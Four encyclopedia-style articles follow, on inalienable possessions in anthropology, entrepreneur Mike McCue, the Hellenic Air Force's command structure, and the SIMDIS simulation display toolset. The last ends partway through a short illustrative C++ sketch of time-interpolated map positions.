Inalienable possessions
https://en.wikipedia.org/wiki/Inalienable%20possessions
Inalienable possessions (or immovable property) are things such as land or objects that are symbolically identified with the groups that own them and so cannot be permanently severed from them. Landed estates in the Middle Ages, for example, had to remain intact and even if sold, they could be reclaimed by blood kin. As a legal classification, inalienable possessions date back to Roman times. According to Barbara Mills, "Inalienable possessions are objects made to be kept (not exchanged), have symbolic and economic power that cannot be transferred, and are often used to authenticate the ritual authority of corporate groups".
Marcel Mauss first described inalienable possessions in The Gift, discussing potlatches, a kind of gift-giving feast held in communities of many indigenous peoples of the Pacific Northwest:
It is even incorrect to speak in these cases of transfer. They are loans rather than sales or true abandonment of possessions. Among the Kwakiutl a certain number of objects, although they appear at the potlatch, cannot be disposed of. In reality these pieces of "property" are sacra that a family divests itself of only with great reluctance and sometimes never.
Annette Weiner broadened the application of the category of property outside the European context with her book Inalienable Possessions: The Paradox of Keeping-While-Giving, focussing on a range of Oceanic societies from Polynesia to Papua New Guinea and testing existing theories of reciprocity and marriage exchange. She also applies the concept to explain examples such as the Kula ring in the Trobriand Islands, which was made famous by Bronisław Malinowski. She explores how such possessions enable hierarchy by establishing a source of lasting social difference. She also describes practices of loaning inalienable possessions as a way of either "temporarily making kin of non-kin" or garnering status.
Inalienable Possessions: The Paradox of Keeping-While-Giving
Inalienable Possessions: The Paradox of Keeping-While-Giving is a book by anthropologist Annette Weiner. Weiner was a Professor of Anthropology and Dean of the Graduate School of Arts at New York University, and served as president of the American Anthropological Association. She died in 1997.
The book focuses on a range of Oceanic societies from Polynesia to Papua New Guinea to test existing theories of reciprocity (gift-giving) and marriage exchange. The book is also important for introducing a consideration of gender in the gift-giving debate by placing women at the heart of the political process. She finds inalienable possessions at the root of many Polynesian kingdoms, such as Hawaii and Samoa. She also credits the original idea of "inalienable possessions" to Mauss, who classified two categories of goods in Samoa, Oloa and le'Tonga, movable and immovable goods exchanged through marriage.
Barbara Mills praised her investigation of how "inalienable possessions are simultaneously used to construct and defeat hierarchy", saying it "opens a boxful of new theoretical and methodological tools for understanding social inequality in past and present societies."
Cosmological authentication
Weiner states that certain objects become inalienable only when they have acquired "cosmological authentication"; that is,
What makes a possession inalienable is its exclusive and cumulative identity with a particular series of owners through time. Its history is authenticated by fictive or true genealogies, origin myths, sacred ancestors, and gods. In this way, inalienable possessions are transcendent treasures to be guarded against all the exigencies that might force their loss.
She gives the example of a Māori Sacred Cloak and says that when a woman wears it "she is more than herself – that she is her ancestors." Cloaks act as conduits for a person's hau, or life-giving spirit. The hau can potentially bring strength or even knowledge, but a person also risks losing their hau. "An inalienable possession acts as a stabilizing force against change because its presence authenticates cosmological origins, kinship, and political histories." In this way, the Cloak actually stands for the person. "These possessions then are the most potent force in the effort to subvert change, while at the same time they stand as the corpus of change".
Paul Sillitoe queries the supposed identification of these objects with persons. He states that these objects are "durable wealth [that] is collective property that is continually in circulation among persons who have temporary possession of it. In this view, transactable objects belong to society as a whole and are not inalienable possessions associated with certain persons. An analogy in Western culture is sporting trophies, such as championship boxing belts owned by all the clubs comprising the association that controls the competition in which constituent club members compete, and which pass for agreed periods of time into the possession of particular champions, changing hands as new champions emerge."
Theuws argues that "Over time, objects acquire new meanings and what was once a humble pot may become a sacred vessel." This transformation in the object is the result of ritualization or a change in cosmology. In fact, "Ritual Knowledge is often a source of political power."
However, these possessions may also become destabilizing, as elites reconstruct those sacred histories to identify themselves with the past; for example, Gandhi invoked the traditional hand-spun cloth, khadi, to contest British rule, which Nehru referred to as Gandhi's "livery of freedom".
Keeping-while-giving
Inalienable possessions are nonetheless frequently drawn into exchange networks. The subtitle of Weiner's book is "The paradox of keeping-while-giving": they are given as gifts (not sold) yet still retain a tie to their owners. These gifts are not like those given in ordinary Western gift-giving, on birthdays for example. Rather, these gifts cannot be re-sold for money by the receiver, because the value and significance of the gift cannot be alienated or disengaged from its relationship to those whose inalienable possession it is.
Property value, obligations and rights
Inalienable possessions are a form of property that cannot be alienated, yet they can still be exchanged. Property can be thought of as a bundle of rights – the right to use something, the right to collect rent from someone, the right to extract something (as in oil drilling), the right to hunt within a particular territory. That ownership may be a bundle of rights held in common by groups of individuals or lineages. The property thus becomes impossible to separate from the group owning it. "To give in this instance means to transfer without alienating, or to use the language of the West, to give means to cede the right of use without ceding actual ownership". In other words, Weiner is contending that an economy built around the moral code of gift giving provides the giver rights over what he or she has given and in turn "subsequently benefits from a series of advantages." Thus, when one accepts a gift one also accepts that the giver now has rights over the receiver.
Reconfiguring exchange theory
Weiner begins by re-examining Mauss' explanation for the return gift, the "spirit of the gift." The "spirit of the gift" was a translation of a Maori word, hau. Weiner demonstrates that not all gifts must be returned. Only gifts that are "immoveable property" can become inalienable gifts. She further argues that inalienable possessions gain the "mana" (spirit) of their possessors, and so become associated with them. These goods are frequently produced by women, like the feather cloak above. The more prominent the woman, the more mana the object is thought to inherit. The longer the kin group can maintain the object in their possession, the more valuable it becomes; but it must also be periodically displayed to assert the group's status, and thus becomes an object of desire for outsiders.
The sibling incest taboo
Weiner argues that the role of women in the exchange of inalienable possessions has been seriously underestimated. Kinship theory, as developed by Claude Lévi-Strauss, used the "sibling incest taboo" to argue that women themselves are objects of exchange between lineage groups. Men had to find women outside their kin groups to marry; hence they "lost" their sisters in order to gain wives. Weiner shows that the focus on women as wives ignores the importance of women as sisters (who are not "lost" as a result of becoming wives). Women produce inalienable possessions which they may take with them when they marry out; the inalienable possession, however, must be reclaimed by the woman's brother after her death in order to maintain the status of the kin group. In comparing Hawaii, Samoa and the Trobriands, she argues that the more stratified a society is by ranked differences, the more important the inalienable possessions produced by sisters become. The more stratified a society becomes (as in Hawaii), the closer the sibling bond ("sibling intimacy"). In these cases, women are critical to the "cosmological authentication" of inalienable possessions.
The defeat of hierarchy
A critical part of Weiner's argument is that the ability to keep inalienable possessions outside of exchange is a source of difference, and hence brings high status. The development of Polynesian kingdoms is an example. She points to the inalienable possessions of the Australian aborigines, however, to demonstrate how the creation of hierarchy can be defeated. Australian inalienable possessions are given cosmological authentication through their religious beliefs in the Dreaming.
Weiner points out that the same gender relations of "sibling intimacy" affect the exchange of these inalienable objects. Women as sisters and women as wives provide the conduit for the gifting and return gifting of these goods, allowing the givers to build prestige. However, insofar as these inalienable possessions lose their cosmological authentication, these social hierarchies lose intergenerational longevity. Because the Dreaming itself is an inalienable possession kept secret by clan elders, it can be lost and hierarchy defeated.
The paradox of keeping-while-giving
Weiner has used the term to categorize the many Kula valuables of the Trobriand islanders, who view those objects as culturally imbued with the spirit of the gift giver. Thus, when they are transferred from one individual or group to another, the objects retain meaningful bonds with the giver and their lineage. The shell bracelets and necklaces given in exchange each have their own histories, and are thus ranked on the basis of whom they have been exchanged with. There were also less well-known shells called kitomu, which were individually owned (rather than being part of lineage history) and which would be given to temporarily please a disappointed trade partner expecting a more valuable shell.
The Kula trade was organized differently in the more hierarchical parts of the Trobriand islands. There, only chiefs were allowed to engage in Kula exchange. In hierarchical areas, individuals can earn their own kitomu shells, whereas in less hierarchical areas, they are always subject to the claims of matrilineal kin. And lastly, in the hierarchical areas, Kula necklaces and bracelets are saved for external exchange only; stone axe blades are used internally. In less hierarchical areas, exchange partners may lose their valuables to internal claims. As a result, most seek to exchange their kula valuables with chiefs, who thus become the most successful players. The chiefs have saved their Kula valuables for external trade, and external traders seek to trade with them before they lose their valuables to internal claims.
Kula exchange is the only way for an individual to achieve local prestige without local political action. But this prestige is fleeting and does not transform into permanent differences in rank because women's participation is minor and Kula shells lack cosmological authentication. It is not Kula shells but women's cloth wealth that is connected with matrilineal ancestors. It is for this reason that women retain high prestige and authority despite the fame of male Kula exchange players.
Godelier on keeping-for-giving and giving-for-keeping
Maurice Godelier has further elaborated on Annette Weiner's ideas on inalienable possessions in The Enigma of the Gift. He derived two theses from Weiner, to which he adds a third.
First Thesis: As discussed above, even in a society that is dominated by a gift-giving economic and moral code, the interplay of gift and counter-gift doesn't completely dominate the social sphere, as there must be some objects which are kept and not given. These things, such as valuables, talismans, knowledge, and rites, confirm identities and their continuity over time. Moreover, they acknowledge differences of identity of individuals or groups linked by various kinds of exchanges.
Second Thesis: Women, or the feminine element, also exercise power by providing legitimation and the redistribution of political and religious power among groups in a society. Godelier contends that Weiner refocuses attention on the role of women in constructing and legitimizing power. While women, as wives, are frequently lowered in status, as sisters they frequently retain equal status with their brothers. For example, in Polynesia, the woman as a sister appears to control those goods associated with the sacred, the ancestors, and the gods.
To this, Godelier adds a third thesis.
Third thesis: The social is not just the sum of alienable and inalienable goods, but is brought into existence by the difference and inter-dependence of these two spheres of exchange. Maintaining society thus requires not keeping-while-giving, but "keeping-for-giving and giving-for-keeping."
Related anthropologists on exchange theory
Emile Durkheim "describes how exchange involves an intensive bonding more formidable than mere economic relations. Social cohesiveness occurs because one person is always dependent on another to achieve a feeling of completeness". This comes into being via the domain of the sacred ritual that involves communal participation even as it encompasses the moment in a higher order of sacredness.
Bronisław Malinowski wrote Argonauts of the Western Pacific. Malinowski was a pioneer of ethnographic fieldwork in the Trobriand Islands and researched Kula exchange. His work was later re-analyzed by Mauss and subsequently by other anthropologists.
Marcel Mauss wrote The Gift. He was a pioneer in the study of gift exchange. Mauss was concerned only with the relations formed by the circulation of things that men produce, and not with the relations that men form while they produce things. He is concerned, in particular, with why people give gifts, and why they feel the obligation to make a return. In fact, he contended that inalienability is based on, or legitimized by, the belief that there is present in the object a power, a spirit, a spiritual reality that binds it to the giver and accompanies the object wherever it goes. This spirit then wishes to return to its source, the original giver.
Marshall Sahlins wrote Stone Age Economics. Sahlins disagreed with Mauss on several points and contended that "the freedom to gain at others' expense is not envisioned by the relations and forms of exchange." Moreover, "The material flow underwrites or initiates social relations…. Persons and groups confront each other not merely as distinct interests but with the possible inclination and certain right to physically prosecute these interests."
Claude Lévi-Strauss applauded Marcel Mauss for his efforts even as he criticized him for not perceiving that "the primary fundamental phenomena (of social life) is exchange itself." He believed that "society is better understood in terms of language than from the standpoint of any other paradigm." Moreover, he thought that anthropologists and ethnographers, particularly Mauss, were becoming confused by the languages of those they studied ethnographically, resulting in obscure theories that did not really make sense. He advocated structuralist analysis in an attempt to clear up certain confusions caused by Mauss' work.
Maurice Godelier wrote The Enigma of the Gift. Godelier expanded on Weiner's work by maintaining that society requires not keeping-while-giving, but "keeping-for-giving and giving-for-keeping."
Importance
Economists have often shunned the question of exactly why people want goods. Goods serve many purposes beyond what classical economists might theorize; according to the prominent anthropologist Mary Douglas, goods can serve as systems of social communication. Anthropology in general is important to economics because it addresses the socio-cultural relationships in an economy, and the economy itself as a cultural system that is not just market-based. Moreover, entire industries are often based on gift giving, such as the pharmaceutical industry. In addition, gift-giving plays an important role in how social and business relations evolve in major economies such as China.
The concept has also been applied to objects in works of fiction, such as the One Ring in Lord of the Rings.
Notes
References
Marcel Mauss, The Gift: The Form and Reason for Exchange in Archaic Societies. Originally published in 1925 as Essai sur le don. Forme et raison de l'échange dans les sociétés archaïques. Lewis Hyde calls this "the classic work on gift exchange".
Mike McCue
https://en.wikipedia.org/wiki/Mike%20McCue
Mike McCue (born 1968) is an American technology entrepreneur who founded or co-founded Paper Software, Tellme Networks, and Flipboard.
Early life
McCue grew up in New York City, the oldest of six children. His parents, Lucy Ann and Patrick J., ran a small ad agency. When McCue was in his early teens, his father, who lacked health insurance, was diagnosed with terminal cancer, and the family was forced out of their home and had to rely on food stamps. After his father died of cancer, McCue chose to help his family instead of joining the United States Air Force Academy, and never attended college.
Career
Early career
McCue was fascinated by software and began his first business in his early teens, writing video games at home that he licensed to magazines and eventually to a games publisher. He had wanted to be an astronaut, and his first real app, he said, was a space shuttle flight simulator he wrote in TI-BASIC in 1981.
Admiring technology entrepreneurs like Steve Jobs, Mitch Kapor and Bill Gates, McCue joined IBM in 1986, giving up a congressional nomination to attend the US Air Force Academy. He was employed on a six-month temporary contract but ended up staying three-and-a-half years.
Paper Software and Netscape
In 1989 McCue founded his first company, Paper Software, aiming "to make using a computer as easy as using a piece of paper". At first the company was not successful and McCue spent a summer digging ditches and building houses to raise funds, and then doing software design consulting for a company contracted to the pharmaceutical firm Merck & Co.
Paper Software's first product was Sidebar, a set of icons designed to make using a computer more intuitive, but after discovering Mosaic, McCue began to develop technology allowing web browsers to display complex 3-D graphics. McCue acted as CEO, winning nearly 80% market share in 3D internet software from Microsoft and SGI.
McCue rejected offers for Paper Software from America Online and Silicon Graphics before selling to Netscape for $20 million in February 1996. At Netscape, McCue was appointed Vice President of Technology, helping to create Netscape Netcaster and working on transforming the Netscape Navigator browser into a Web-based desktop operating system. It has been said that the project, called Constellation after a boat McCue's father had helped to restore, led Microsoft to alter its Windows licensing agreements to prevent PC manufacturers from using competing software, eventually leading to antitrust proceedings against the company.
When McCue later paid $200,000 for a 48-foot classic wooden sailboat he named it “Constellation”.
Tellme Networks and Microsoft
In February 1999 McCue left Netscape to co-found Tellme Networks with Angus Davis. McCue had previously recruited Davis to work at Netscape when he was 19 years old, and credited him with the idea for the new company. Tellme went on to raise $238 million in venture capital.
Tellme launched in July 2000 with the ambition of creating a 'voice browser' by using voice-recognition software to allow users to find internet-based information through their telephone with simple voice commands. “When you pick up a phone,” McCue explained in 2001, “you'll hear a friendly voice say, ‘What would you like to do?’ and you’ll be able to place a call or do a whole variety of things using simple key words.”
Tellme became the standard for "voice browsers" and in March 2007 the company was acquired by Microsoft for a rumoured $800 million.
McCue described his efforts to make design a higher priority at Microsoft as a work in progress during his time at the company: "I'd give it probably a 'C-plus' to a 'B' right now," he said in 2009.
Flipboard
McCue left Microsoft in June 2009. In January 2010, with Evan Doll, one of the early engineers on the iPhone team at Apple, he co-founded Flipboard, the "social magazine" app for Apple's iPad. Flipboard launched in July 2010, having secured $10.5 million of venture capital from investors including John Doerr of Kleiner Perkins Caufield & Byers (who had also invested in Tellme), Index Ventures, The Chernin Group, Twitter creator Jack Dorsey, Facebook co-founder Dustin Moskovitz, and Ashton Kutcher.
Flipboard evolved from a thought experiment undertaken by McCue and Doll in which they asked what the web would look like if it was washed away in a hurricane and needed to be built again from scratch with the knowledge of hindsight. "We thought," said McCue, "it would be possible to build something from the ground up that was inherently social. And we thought that new form factors like the tablet would enable content to be presented in ways that were fundamentally more beautiful." McCue said that when reading magazines like National Geographic he would ask himself: "Why is it that the Web isn't as beautiful as these magazines? What could we do to make the web a more beautiful place?"
McCue was critical of the way that journalism appeared on the web, saying that it had been "contaminated by the Web form factor" and was being pushed into trying to support the monetization model of the web by driving page views with slide shows, condensed columns of narrow text and distracting advertisements, a space where, he said, "I don't think it should ever go". "It's not ... a pleasant experience to 'curl up' with a good website", he said.
With this in mind they recruited Marcos Weskamp, the designer who in 2004 had built newsmap.jp to graphically display a heatmap of stories from the Google News news aggregator. Flipboard became what they called the first social magazine, allowing people to consume media from Facebook and Twitter in an easier and more aesthetically interesting way.
By December 2010, Flipboard claimed that they were installed on about 10% of the 8-9 million iPads then in circulation; Apple named Flipboard its iPad app of the year. In April 2011 McCue confirmed a $50 million round of financing, valuing Flipboard at $200 million.
In August 2018, Flipboard claimed they had 145 million monthly users with 11,000 publishers.
Twitter
McCue served on the board of directors at Twitter from December 2010 until August 2012. He was initially appointed as a compromise candidate between the company and Kleiner Perkins Caufield & Byers, from whom Twitter had just raised $200 million in a round of funding. His recruitment led to speculation that Twitter was heading towards creating a media and publishing business.
McCue has had a long association with Kleiner Perkins, which invested in Netscape, Tellme Networks and Flipboard. Ellen Pao, who was a junior partner at the firm when he joined the board of Twitter, was also a board member at Flipboard having worked with McCue at Tellme. McCue praised the work of Pao and Kleiner Perkins, restating that opinion when Pao brought a gender-discrimination lawsuit against the venture capital firm in 2012.
McCue's departure came as Twitter moved to reassess the terms of its use by third-party developers and as it was beginning to enhance its own presentation of news articles and other information, moving it potentially into competition with Flipboard. In September 2012, McCue cautioned Twitter against compromising its existing relationships, telling The Daily Telegraph: "Twitter was created as an open platform, an open communications ecosystem, and I hope it can stay that way. You have to be really careful not to let money get in the way of that."
Personal life
In June 2013, McCue hosted U.S. President Barack Obama at his home in Palo Alto for a Democratic fundraiser that cost each guest $2500.
References
External links
McCue's Twitter Account
Structure of the Hellenic Air Force
https://en.wikipedia.org/wiki/Structure%20of%20the%20Hellenic%20Air%20Force
This article provides an overview of the entire chain of command and organization of the Hellenic Air Force as of 2018 and includes all currently active units. The Hellenic Air Force is commanded by the Chief of the Air Force General Staff in Athens.
The source for this article is the organization sections on the website of the Hellenic Air Force.
Administrative Organization
The Hellenic Air Force is overseen by the Ministry of National Defense under the Minister of Defense Nikolaos Panagiotopoulos.
Ministry of National Defence, in Athens
Air Force General Staff, at Papagou Military Base
Air Force Tactical Command (Αρχηγείο Τακτικής Αεροπορίας, ATA), at Larissa Air Base
Air Force Training Command (Διοίκηση Αεροπορικής Εκπαίδευσης, ΔΑΕ), at Dekelia Air Base
Air Force Support Command (Διοίκηση Αεροπορικής Υποστήριξης, ΔΑΥ), at Elefsina Air Base
Air Force General Staff
The Air Force General Staff based at Papagou Military Base in Filothei is structured as follows:
Air Force General Staff, at Papagou Military Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A3 Directorate (Exercises - Operational Training)
A4 Directorate (Air Defense)
A7 Directorate (Intelligence - Information Security)
Operational Center
B Branch (Personnel - Training)
B1 Directorate (Military Personnel)
B2 Directorate (Training)
B3 (Personnel Management)
B4 (Military Recruitment)
B5 Directorate (Civilian Personnel)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C4 Directorate (Communications)
C5 Directorate (Information Technology)
C7 Directorate (Supply)
D Branch (Policy and Development)
D1 Directorate (Organization)
D2 Directorate (Defense Planning and Programming)
D3 Directorate (Armament Programs)
D6 Directorate (Financial Services)
The Air Force General Staff commands the following units and services:
Air Force General Staff, at Papagou Military Base
Air Force Academy, at Dekelia Air Base
360th Squadron "Thales" – (T-41D Mescalero)
251st General Aviation Hospital, in Athens
Fuel Pipeline Management, in Eleftherio Larissa
Fuel Base Antikyra
Fuel Base Mikrothives
Fuel Base Triadi
Fuel Unit Aliartos
Fuel Unit Modi
Fuel Unit Rachon
Aviation Medicine Center, in Athens
Supreme Air Force Medical Committee, in Athens
Air Force Project Service, at Papagou Military Base
Air Force Finance & Accounting Center, at Papagou Military Base
Air Force General Staff Support Squadron, at Papagou Military Base
Air Force General Staff Computer Center, at Papagou Military Base
Air Force Military Police, in Vyronas
31st Search and Rescue Operations Squadron, at Elefsina Air Base (Special Forces)
National Meteorological Service, in Ellinikon
Air Traffic Information Service, at the Hellenic Civil Aviation Authority in Glyfada
Air Force Insurance Service, in Athens
Air Force Materiel Audit Authority, in Ampelokipoi
Air Force Audit Authority Athens, in Ampelokipoi
Air Force Audit Authority Larissa, in Larissa
Air Force Treasury Service, in Athens
Joint Rescue Control Center / Air Force Service, at the Hellenic Coast Guard headquarters in Piraeus
Hellenic Tactical Air Force
The Hellenic Tactical Air Force based at Larissa Air Base is structured as follows:
Hellenic Tactical Air Force, at Larissa Air Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A3 Directorate (Exercises - Allied Affairs)
A4 Directorate (Air Defense Survival)
A7 Directorate (Information Security)
B Branch (Personnel)
B1 Directorate (Military Personnel - Personnel Management)
B2 Directorate (Education)
B5 Directorate (Civilian Personnel)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C4 Directorate (Communications, Information Technology & Electronic Equipment)
C7 Directorate (Supply)
The Air Force Tactical Command commands the following units:
Air Force Tactical Command, at Larissa Air Base
Air Operations Center, at Larissa Air Base, reports to NATO's Integrated Air Defense System CAOC Torrejón in Spain
1st Area Control Centre, inside Mount Chortiatis
2nd Area Control Centre, inside Mount Parnitha
Air Tactics Center, at Andravida Air Base
Fighter Weapons School
Electronic Warfare School
Joint Electronic Warfare School
Air to Ground Operations School
Tactical Support Squadron
110th Combat Wing, at Larissa Air Base
337th Squadron "Ghost" – (F-16C/D Block 52+)
Unmanned Aircraft Squadron "Acheron" – (Pegasus II)
111th Combat Wing, at Nea Anchialos Air Base
330th Squadron "Thunder" – (F-16C/D Block 30)
341st Squadron "Arrow" – (F-16C/D Block 50 in the Suppression of Enemy Air Defense role)
347th Squadron "Perseus" – (F-16C/D Block 50)
114th Combat Wing, at Tanagra Air Base
331st All Weather Squadron "Theseus" – (Mirage 2000-5 Mk3)
332nd All Weather Squadron "Hawk" – (Mirage 2000-BGM/EGM3)
115th Combat Wing, at Souda Air Base, Crete
340th Squadron "Fox" – (F-16C/D Block 52+)
343rd Squadron "Star" – (F-16C/D Block 52+)
116th Combat Wing, at Araxos Air Base
335th Bomber Squadron "Tiger" – (F-16C/D Block 52+ Advanced)
336th Bomber Squadron "Olympus" – (F-16C/D Block 52+ Advanced)
117th Combat Wing, at Andravida Air Base
338th Fighter-Bomber Squadron "Ares" – (F-4E PI2000 Phantom II)
350th Guided Missile Wing, at Sedes Air Base
11th Guided Missile Squadron, at Heraklion Air Base – (S-300 PMU-1, TOR M1)
21st Guided Missile Squadron, in Keratea – (MIM-104 Patriot PAC-3)
22nd Guided Missile Squadron, at Skyros Air Base – (MIM-104 Patriot PAC-3)
23rd Guided Missile Squadron, at Sedes Air Base – (MIM-104 Patriot PAC-3)
24th Guided Missile Squadron, at Tympaki Air Base – (MIM-104 Patriot PAC-3)
25th Guided Missile Squadron, at Chrysoupoli Air Base – (MIM-104 Patriot PAC-3, TOR M1)
26th Guided Missile Squadron, at Tanagra Air Base – (MIM-104 Patriot PAC-3, Crotale NG/GR)
Guided Missile Maintenance Squadron, at Sedes Air Base
Guided Missile Training Squadron, at Sedes Air Base
130th Combat Group, at Lemnos Air Base (rotational deployment of F-16 fighters and AS332C1 Super Puma SAR helicopters)
133rd Combat Group, at Kasteli Air Base (rotational deployment of F-16 fighters)
135th Combat Group, at Skyros Air Base (rotational deployment of F-16 or Mirage-2000-5 fighters)
140th Operational Intelligence & Electronic Warfare Group, at Larissa Air Base
1st Control and Warning Station Squadron, in Didymoteicho
2nd Control and Warning Station Squadron, on Mount Ismaros
3rd Control and Warning Station Squadron, on Mount Vitsi
4th Control and Warning Station Squadron, on Mount Elati
5th Control and Warning Station Squadron, in Kissamos
6th Control and Warning Station Squadron, on Mykonos
7th Control and Warning Station Squadron, on Mount Mela
8th Control and Warning Station Squadron, on Lemnos
9th Control and Warning Station Squadron, on Mount Pelion
10th Control and Warning Station Squadron, on Mount Chortiatis
11th Control and Warning Station Squadron, in Ziros
380th Airborne Early Warning & Control Squadron "Uranos", at Elefsina Air Base – (Erieye EMB-145H AEW&C)
Air Defense Information Center, at the Hellenic Civil Aviation Authority in Glyfada
Instrument Flight Training Center, at Larissa Air Base
Meteorological Center, at Larissa Air Base
Aktion Airport Detachment
Karpathos Airport Detachment
Chrysoupoli Airport Detachment
Air Force Tactical Command Structure Graphic
Air Force Support Command
The Air Force Support Command based at Elefsina Air Base is structured as follows:
Air Force Support Command, at Elefsina Air Base
A Branch (Operations)
A1 Directorate (Operations Planning - Operations)
A8 Directorate (Education)
A10 Directorate (Military Personnel)
A11 Directorate (Civilian Personnel)
Operations Center
C Branch (Support)
C1 Directorate (Transportation Support - Training Support)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C4 Directorate (Communications, Information Technology & Electronic Equipment)
C7 Directorate (Supply Transport)
C8 Directorate (Fighter Support - Armament)
C9 Directorate (Quality Assurance)
C10 Directorate (Factory Support)
The Air Force Support Command commands the following units:
Air Force Support Command, at Elefsina Air Base
112th Combat Wing, at Elefsina Air Base
352nd VIP Transport Squadron "Cosmos" – (EMB-135LR EMB-135BJ, Gulfstream V, AB 212)
354th Tactical Transport Squadron "Pegasus" – (C-27J Spartan)
355th Tactical Transport Squadron "Atlas" – (CL-215)
356th Tactical Transport Squadron "Hercules" – (C-130H Hercules)
358th Search and Rescue Squadron "Phaethon" – (Bell-205A1, AB 212, AW-109E)
384th Search and Rescue Squadron "Puma" – (AS-332C1 Super Puma)
113th Combat Wing, at Sedes Air Base
383rd Special Operations & Air Fire Fighting Squadron "Proteus" – (CL-415GR, CL-415MP)
206th Infrastructure Wing, in Ano Liosia
Construction Wing (Planning)
Construction Squadron
Mobile Electrical Repair Group
Mobile Underwater Plant Maintenance Group
Mobile Disaster Response Team
Mobile Aircraft Shelter Maintenance Team
Mobile Runway Maintenance Team
Mobile Air Conditioning Maintenance Team
State Aircraft Factory, at Elefsina Air Base
Telecommunications and Electronic Equipment Plant, in Glyfada
Transport and Ground Equipment Plant, in Araxos
Air Force Calibration Service, in Vyronas
201st Central Supply Depot, at Elefsina Air Base
Main Repairable Materials Supply Depot, at Tanagra Air Base
Main Supply Depot, in Araxos
Main Supply Depot, in Valanidia
204th Ammunition Supply Depot, in Avlida
359th Public Services Air Support Squadron, at Dekelia Air Base (Fire fighting) (M18-B and M18-BS)
Air Force Personnel Service Group, in Athens (Commissary management)
Air Force Purchasing Service, in Ambelokipi
Rhodes Airport Detachment
Santorini Airport Detachment
Air Force Publication Agency, at Dekelia Air Base
Air Force Agency at Hellenic Aerospace Industry, in Tanagra
Air Force Training Command
The Air Force Training Command based at Dekelia Air Base is structured as follows:
Air Force Training Command, at Dekelia Air Base
B Branch (Personnel - Training)
B1 Directorate (Military Personnel - Staff Selection)
B2 Directorate (Ground Training - Military Schools)
B5 Directorate (Civilian Personnel)
B6 Directorate (Air Training - Operations - Exercises)
B7 Directorate (Standardization - Staff Evaluation - Inspections)
C Branch (Support)
C1 Directorate (Aircraft - Armament)
C2 Directorate (Infrastructure)
C3 Directorate (Financial Service)
C7 Directorate (Supply)
The Air Force Training Command commands the following units:
Air Force Training Command, at Dekelia Air Base
120th Air Training Wing, at Kalamata Air Base
361st Air Training Squadron "Mystras" – (T-6A Texan II)
362nd Air Training Squadron "Nestor" – (T-2E Buckeye)
363rd Air Training Squadron "Danaos" – (T-2E Buckeye)
364th Air Training Squadron "Pelops" – (T-6A Texan II)
Sea Survival Training School
124th Basic Training Wing, in Tripoli
123rd Technical Training Group, at Dekelia Air Base
Air Defense Training Center
Air Force Museum
Air Force History Museum
128th Telecommunication & Electronics Training Group, in Kavouri
Information Technology
Telecommunication School
Radar School
Radio Navigation School
Air Force Command & Staff College, at Dekelia Air Base
Air Force Command and Staff Course
Air Force Junior Officers School
Foreign Languages School
Flight and Ground Safety School
Accident Prevention School
Training Administration School
Intelligence Officers School
Nuclear Biological and Chemical Defense School
Human Performance in Military Aviation School
Air Force NCO School, at Dekelia Air Base
Technical NCO Academy
Radio Navigators Academy
Administrative NCO Academy, at Sedes Air Base
Dog Training Center, in Koropi
References
External links
Hellenic Air Force Website
Ministry of National Defence Website
SIMDIS
https://en.wikipedia.org/wiki/SIMDIS
SIMDIS is a software toolset developed by Code 5770 at the US Naval Research Laboratory (NRL) that provides 2D and 3D interactive graphical and video displays of live and postprocessed simulation, test, and operational data. SIMDIS is a portmanteau of simulation and display.
Features
SIMDIS runs on Windows, Linux, and Sun Microsystems workstations with hardware-accelerated 3D graphics and provides identical execution and "look and feel" for all supported platforms.
SIMDIS provides either a 2D or a 3D display of the normally "seen" data such as platform position and orientation, as well as the "unseen" data such as the interactions of sensor systems with targets, countermeasures, and the environment. It includes custom tools for interactively analyzing and displaying data for equipment modes, spatial grids, ranges, angles, antenna patterns, line of sight and RF propagation. Capability for viewing time synchronized data from either a standalone workstation or multiple networked workstations is also provided.
To meet the needs of range operators, simulation users, analysts, and decision makers SIMDIS provides multiple modes of operation including live display, interactive playback, and scripted multimedia modes. It also provides capability for manipulation of post-processed data and integration with charts, graphs, pictures, audio and video for use in the development and delivery of 3-D visual presentations.
SIMDIS binaries are released under U.S. Department of Defense (DoD) Distribution Statement A, meaning the binaries are approved for public release with unlimited distribution. SIMDIS has been independently accredited and certified by Commander Operational Test and Evaluation Force (COMOPTEVFOR) and Joint Forces Command (JFCOM). It has also been approved for use on the Navy/Marine Corps Intranet (NMCI).
Operational use
SIMDIS provides support for analysis and display of test and training mission data to more than 4000 users. At the Naval Research Laboratory and other sites, SIMDIS has been used for numerous simulation, test and training applications, analyzing disparate test data in a common frame of reference. SIMDIS is currently an operational display system for the Missile Defense Agency (MDA), the Naval Undersea Warfare Center (NUWC), the Pacific Missile Range Facility (PMRF), the Southern California Offshore Range (SCORE), and the Central Test and Evaluation Investment Program's (CTEIP) Test and Training Enabling Architecture (TENA). In addition to the Defense community, SIMDIS has also gained acceptance in various other U.S. government organizations and in the foreign community.
The SIMDIS SDK
The SIMDIS Software Development Kit (SDK) is an open source C++ framework for creating 3D scenes of objects, placed relative to a geographic map, whose position and state change with time. The SIMDIS SDK is the underlying application framework supporting SIMDIS.
Around 2017, SIMDIS released its SDK as open source. It is hosted on GitHub.
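A rough sketch of that core idea follows. It is not the actual SIMDIS SDK API; the class, field, and function names are hypothetical, and C++ is used simply because the SDK itself is C++. A time-dynamic platform is modeled as time-stamped geodetic samples that are interpolated at whatever display time is requested.

// Hypothetical illustration only -- not the SIMDIS SDK API.
// A platform's geodetic position is sampled over time and interpolated
// for display at an arbitrary query time, relative to a geographic map.
#include <iostream>
#include <iterator>
#include <map>
#include <string>
#include <utility>

// A geodetic position (degrees / metres), the frame a map display uses.
struct GeoPosition {
    double latitudeDeg;
    double longitudeDeg;
    double altitudeM;
};

// A platform track: position samples keyed by time in seconds.
class PlatformTrack {
public:
    explicit PlatformTrack(std::string name) : name_(std::move(name)) {}

    void addSample(double timeSec, const GeoPosition& pos) { samples_[timeSec] = pos; }

    // Linearly interpolate the position at a query time, clamping to the
    // first/last sample outside the recorded interval.
    GeoPosition positionAt(double timeSec) const {
        if (samples_.empty()) return GeoPosition{};
        auto upper = samples_.lower_bound(timeSec);
        if (upper == samples_.begin()) return upper->second;
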